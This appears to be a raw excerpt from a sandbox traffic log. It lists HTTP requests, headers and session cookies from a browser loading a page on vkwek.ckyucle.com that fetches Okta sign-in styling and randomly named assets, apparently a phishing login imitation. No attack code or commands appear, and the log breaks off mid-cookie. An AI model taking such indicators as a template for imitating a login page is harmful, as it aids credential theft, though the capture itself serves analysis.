XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /yzBt71gp856BSdkJ4Qop47 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /78l8NmRVxJ45fjuJRst60 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /45TplGCNDXCptZb896Wyz84jpQxy69 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=64710-64710If-Range: "28feccc0-15d9d"
        Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=64710-89500If-Range: "28feccc0-15d9d"
        Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T073932Z&X-Amz-Expires=300&X-Amz-Signature=aca7c6b73d5e3c084a388576b46174841ccd1d5d20df0b47f08acd7640c141a5&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ef6ywsH6ValAwIHzgds78wUwuLf89smkl92 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; 